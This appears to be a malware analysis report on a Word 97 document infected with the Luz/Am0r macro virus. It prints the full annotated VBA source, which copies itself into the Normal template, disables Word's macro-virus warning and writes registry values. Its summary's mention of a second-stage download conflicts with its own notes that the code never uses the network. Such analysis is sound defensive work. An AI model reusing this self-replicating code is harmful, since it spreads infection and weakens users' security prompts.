Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5297e24ad098fa16…

MALICIOUS

Office (OLE)

41.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: bf28f2a2b926107012eb07f9b8f6f6b8 SHA-1: 3d72278aa549ec2befd52ef3e392bb2293177632 SHA-256: 5297e24ad098fa165947acfc5057347155b389ffd9836f4ecef751553fcfd3c5
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Luz-1'. It contains VBA macros that, when executed, attempt to write values to the registry keys 'RegisteredOwner' and 'RegisteredOrganization' under 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion'. Additionally, the macro attempts to export a form to 'c:\MS Office Luz.frm'. These actions suggest an attempt to establish persistence or download and execute a second-stage payload.

Heuristics 2

  • ClamAV: Doc.Trojan.Luz-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Luz-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13564 bytes
SHA-256: 32f246ff2487e05cfb71d94989d0569121093171d4e62d4deb526df9bd7ab3d4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' 1
' Analyst notes: Document_Close is the replication routine of this macro virus.
' On every document close it copies its own module between the open document
' and the Normal template, using the marker string "Am0r" (present in the
' string literal written to the registry below) to tell which side already
' carries the code.  Nothing in this routine reads from or writes to the
' network; the two registry values are cosmetic "signature" strings and are
' best treated as host IoCs, while persistence comes from the infected Normal
' template, which Word loads at every start.  The VBProject/VBComponents
' access on the first two Set lines is what makes the copy possible; with
' "Trust access to the VBA project object model" left disabled (the modern
' default) those calls fail and, because of On Error Resume Next, the rest of
' the routine silently does nothing useful.
Private Sub Document_Close()
' Every runtime error is swallowed, so a blocked step is skipped rather than
' surfaced to the user.
On Error Resume Next

'This is very important information
'please, do not delete or modify !!!

' VBA quirk: only the last name in each Dim list gets the declared type, so
' x, SaveDocument, SaveNormalTemplate, DocInf, AD, OurCode, OurCode2, LogData
' and LogFile are Variants.  LogData and LogFile are declared but never used.
' Contor is the generation counter parsed from the "' N" first line of the
' module source.
Dim x, Contor As Integer
Dim SaveDocument, SaveNormalTemplate, DocInf, NorInf As Boolean
Dim AD, NT As Object
Dim OurCode, OurCode2, LogData, LogFile, Temp As String

' AD / NT: first VB component of the active document and of Normal.dot
' (presumably the ThisDocument module in each).
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
' Infection check: is the marker string present in each module's source?
DocInf = AD.CodeModule.Find("Am0r", 1, 1, 10000, 10000)
NorInf = NT.CodeModule.Find("Am0r", 1, 1, 10000, 10000)
Contor = 0

' Disables Word's macro-warning dialog (Word 97/2000-era option) and the
' "save changes to Normal?" prompt, so the template write below is silent.
Options.VirusProtection = False
Options.SaveNormalPrompt = False

' Replicate only when exactly one side is infected (Xor) and the document is
' a .doc or .dot (other formats cannot carry the module).
If (DocInf = True Xor NorInf = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
 ActiveDocument.SaveFormat = wdFormatTemplate) Then
 ' Roughly 1-in-20 chance of a harmless message box showing the user name.
 Randomize
 x = Int(Rnd * 20)
 If x = 10 Then MsgBox "Your name is " & Application.UserName, vbInformation, "Unrequested Info"
 
 ' Document -> Normal template: copy this module's source (lines 2..N-1,
 ' re-prefixed with a fresh "' 1" counter line) over the template module,
 ' write the two registry strings via Word's PrivateProfileString registry
 ' shortcut, then move the Joculetz form across via an export/import through
 ' a temp file in c:\.  Normal is saved only if it was already clean of
 ' unsaved changes, to avoid drawing attention.
 If DocInf = True Then
   SaveNormalTemplate = NormalTemplate.Saved
   OurCode = AD.CodeModule.lines(2, AD.CodeModule.countoflines - 1)
   OurCode = "' 1" & Chr(13) & OurCode
   NT.CodeModule.deletelines 1, NT.CodeModule.countoflines
   NT.CodeModule.addfromstring OurCode
   System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Luz Clarita"
   System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "Am0r A La Mexicana"
   ActiveDocument.VBProject.VBComponents.Item(2).Export ("c:\MS Office Luz.frm")
   NormalTemplate.VBProject.VBComponents.Import ("c:\MS Office Luz.frm")
   If SaveNormalTemplate = True Then NormalTemplate.Save
 End If
 
 ' Normal template -> document: copy the template module into the document
 ' unchanged, and rewrite the template module with the counter on its first
 ' line incremented (Mid(...,2,3) reads the digits after the apostrophe).
 ' The extra FullName/Saved condition limits this to documents that have a
 ' drive-letter path or unsaved changes.
 If NorInf = True And _
   (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
    ActiveDocument.Saved = False) Then
   SaveDocument = ActiveDocument.Saved
   OurCode = NT.CodeModule.lines(1, NT.CodeModule.countoflines)
    OurCode2 = OurCode
    Contor = Int(Trim(Mid(OurCode2, 2, 3))) + 1
    OurCode2 = NT.CodeModule.lines(2, NT.CodeModule.countoflines - 1)
    Temp = Trim("'" & Str(Contor) & Chr(13))
    OurCode2 = Temp + OurCode2
   AD.CodeModule.deletelines 1, AD.CodeModule.countoflines
   AD.CodeModule.addfromstring OurCode
   NT.CodeModule.deletelines 1, NT.CodeModule.countoflines
   NT.CodeModule.addfromstring OurCode2
   NormalTemplate.VBProject.VBComponents.Item(2).Export ("c:\MS Office Luz.frm")
   ActiveDocument.VBProject.VBComponents.Import ("c:\MS Office Luz.frm")
   If SaveDocument = True Then ActiveDocument.Save
 End If
End If
' Payload trigger: once the template has seeded 66 or more documents, show
' the greeting and the Joculetz form (a UI annoyance, no destructive action
' visible in the extracted source).
If Contor >= 66 Then
 MsgBox "Hello! " & _
 "My name is Luz Clarita and I'm a very friendly macro-virus." & _
 Chr(13) & "You should share your documents with your friends... :-)" & _
 Chr(13) & "I salut you from Romania!", vbExclamation, "SALUT!"
 Joculetz.Show
End If
End Sub

' Empty Document_New handler: present in the module but does nothing, so new
' documents are not touched at creation time (infection happens on close).
Private Sub Document_New()

End Sub





























Attribute VB_Name = "Joculetz"
Attribute VB_Base = "0{3087F2FC-E9D8-11D3-ACD9-900936D3B526}{3087F2F6-E9D8-11D3-ACD9-900936D3B526}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





' Joculetz form button: hides the form and sets the caption to "Aha", which is
' the exit condition for the animation loop in UserForm_Activate.
Private Sub CommandButton1_Click()
Joculetz.Hide
CommandButton1.Caption = "Aha"
End Sub

' Joculetz form animation: a busy loop that bounces the label's font size
' between 8 and 35 and the button's horizontal position between 20 and
' (form width - 70), counting 1..100 in the button caption each pass.  The
' module has no Option Explicit, so a, b, i and dummy are implicit Variants.
' DoEvents keeps the UI responsive; the loop ends only when the user clicks
' the button (which sets the caption to "Aha").  Purely a nuisance payload.
Private Sub UserForm_Activate()
a = 1
b = 5
Do
 Label1.Font.Size = Label1.Font.Size + a
 CommandButton1.Left = CommandButton1.Left + b
 If Label1.Font.Size >= 35 Then a = -a
 If CommandButton1.Left >= Joculetz.Width - 70 Then b = -b
 If Label1.Font.Size < 8 Then a = -a
 If CommandButton1.Left < 20 Then b = -b
 For i = 1 To 100
   CommandButton1.Caption = Str(i)
 Next i
 CommandButton1.Caption = "Okay"
 dummy = DoEvents
Loop Until CommandButton1.Caption = "Aha"
End Sub

Private S
... (truncated)